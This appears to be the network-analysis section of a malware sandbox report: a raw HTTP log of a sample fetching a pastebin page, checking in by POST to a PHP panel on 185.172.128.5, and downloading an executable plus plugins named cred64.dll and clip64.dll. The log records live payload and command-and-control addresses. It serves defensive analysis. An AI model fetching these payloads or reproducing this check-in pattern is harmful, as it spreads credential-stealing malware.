Network Analysis

GET /raw/A54sKxhY HTTP/1.1 Host: pastebin.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 22:50:08 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 609 Last-Modified: Mon, 11 Dec 2023 22:39:59 GMT Server: cloudflare CF-RAY: 834148ec5962dbd1-LAX

GET /raw/A54sKxhY HTTP/1.1 Host: pastebin.com

HTTP/1.1 200 OK Date: Mon, 11 Dec 2023 22:51:09 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 670 Last-Modified: Mon, 11 Dec 2023 22:39:59 GMT Server: cloudflare CF-RAY: 83414a670860dbd1-LAX

POST /v8sjh3hs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.5 Content-Length: 4 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 22:49:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

POST /v8sjh3hs8/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MjQyOTU= Host: 185.172.128.5 Content-Length: 24447 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 22:49:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

POST /v8sjh3hs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.5 Content-Length: 160 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 22:49:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /hv.exe HTTP/1.1 Host: 185.172.128.113

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 22:49:27 GMT Content-Type: application/octet-stream Content-Length: 4129664 Last-Modified: Mon, 11 Dec 2023 17:17:31 GMT Connection: keep-alive ETag: "6577442b-3f0380" Accept-Ranges: bytes

POST /v8sjh3hs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.5 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 22:49:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /v8sjh3hs8/Plugins/cred64.dll HTTP/1.1 Host: 185.172.128.5

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 22:49:36 GMT Content-Type: application/octet-stream Content-Length: 1257472 Last-Modified: Thu, 07 Dec 2023 13:11:30 GMT Connection: keep-alive ETag: "6571c482-133000" Accept-Ranges: bytes

POST /v8sjh3hs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.5 Content-Length: 21 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 22:49:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php

GET /v8sjh3hs8/Plugins/clip64.dll HTTP/1.1 Host: 185.172.128.5

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 22:49:49 GMT Content-Type: application/octet-stream Content-Length: 104448 Last-Modified: Thu, 07 Dec 2023 13:11:31 GMT Connection: keep-alive ETag: "6571c483-19800" Accept-Ranges: bytes

POST /v8sjh3hs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.5 Content-Length: 5 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Dec 2023 22:49:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive